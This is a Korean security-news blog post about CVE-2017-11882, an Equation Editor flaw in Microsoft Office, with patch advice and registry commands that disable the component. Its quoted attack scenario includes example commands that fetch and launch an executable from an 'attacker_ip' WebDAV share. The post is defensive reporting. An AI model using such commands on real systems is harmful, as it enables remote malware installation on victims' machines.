포스팅 내용

국내외 보안동향

해커들이 사용자와의 상호작용 없이도 악성코드를 설치하도록 허용하는 17년 된 MS 오피스의 취약점(CVE-2017-11882) 발견

17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction


MS 오피스에서 파일을 열 때 특별히 조심하셔야합니다. 


사용자들이 MS의 내장 기능인 ‘패치 되지 않는’ DDE와 씨름하고 있는 도중, 연구원들이 또 다른 오피스 컴포넌트의 심각한 문제를 발견했습니다. 이는 공격자들이 타겟 컴퓨터에서 원격으로 멀웨어를 설치하도록 허용합니다.


이 취약점은 메모리 손상 문제이며, MS Office 365를 포함한 지난 17년간 출시 되어온 마이크로소프트 오피스의 모든 버전에 존재합니다. 또한 모든 최신 윈도우 10 Creators 업데이트를 포함한 모든 버전의 윈도우 OS에서 동작합니다.


이 취약점은 원격 코드 실행으로 이어지며, 인증 되지 않은 공격자가 원격으로 타겟 시스템에서 악성 코드를 실행할 수 있도록 허용합니다. 이 과정에서 사용자가 악성 문서를 오픈한 후에는 아무런 상호작용도 필요하지 않습니다.


CVE-2017-11882로 등록 된 이 취약점은 이는 문서에 방정식 (OLE 오브젝트)를 삽입하고 편집하는 MS Office의 컴포넌트인 EQNEDT32.EXE에 존재합니다.


<이미지 출처 : https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>


부적절한 메모리 운영으로 인해 이 컴포넌트가 메모리에서 오브젝트들을 적절히 처리하는데 실패해, 공격자가 로그인한 사용자 권한으로 악성 코드를 실행할 수 있도록 허용하게 됩니다.


17년 전, MS Office 2000에서 EQNEDT32.EXE가 도입 되었으며 이전 버전 문서의 호환을 위해 MS Office 2007 이후 공개 된 모든 버전에 이 컴포넌트가 포함 되었습니다.


이 취약점을 악용하기 위해서는, 취약한 MS Office나 MS WordPad를 사용해 특별히 제작한 악성 파일을 오픈해야합니다.


이 취약점은 CVE-2017-11847과 같은 윈도우 커널 권한 상승 익스플로잇과 함께 사용 될 경우 시스템 전체 제어 권한을 갖게 될 수 있습니다.


가능한 공격 시나리오는 아래와 같습니다:


연구원들은 아래와 같은 공격 시나리오들을 고안해냈습니다.


“이 취약점을 악용한 OLE 오브젝트 몇 개를 삽입함으로써, 임의의 명령을 실행할 수 있게 됩니다.(예: 임의의 파일을 인터넷으로부터 받은 후 실행)”


“임의의 코드를 실행하는 가장 쉬운 방법들 중 하나는 공격자가 제어하는 WebDAV 서버로부터 실행 파일을 다운받는 것입니다.”


“그렇지만 공격자는 이 취약점을 이용해 cmd.exe /c start \\attacker_ip\ff와 같은 명령어를 실행할 수 있게 됩니다. 익스플로잇의 일부로 이러한 명령어를 사용해 WebClient를 시작할 수 있습니다.”


“그 이후, 공격자는 \\attacker_ip\ff\1.exe 명령어를 사용해 WebDAV 서버로부터 실행 파일을 시작할 수 있습니다. 이 실행 파일의 시작 매커니즘은 \\live.sysinternals.com\tools 서비스와 유사합니다.”



MS 오피스 취약점으로부터 보호 하는 법


마이크로소프트는 이달 패치를 공개하면서 영향을 받은 소프트웨어가 메모리 내의 오브젝트를 처리하는 방식을 수정해 이 취약점을 수정했습니다.


따라서 사용자들은 11월 패치를 최대한 빨리 적용하기를 권고합니다.


이 컴포넌트에는 악용될 소지가 있는 다수의 보안 문제가 있으므로, 비활성화 하면 보안을 강화시킬 수 있습니다.


명령 프롬프트에서 아래의 명령어를 실행하면 윈도우 레지스트리에 해당 컴포넌트가 등록 되는 것을 방지할 수 있습니다:


reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400


64비트 OS에서 32비트 MS Office 패키지를 사용한다면 아래의 명령어를 실행하면 됩니다:


reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400


이 외에도, 사용자들은 Protected View(마이크로소프트 오피스 샌드박스)를 활성화해 활성 컨텐츠 (OLE/ActiveX/Macro) 실행을 막을 수 있습니다.





출처 :


티스토리 방명록 작성
name password homepage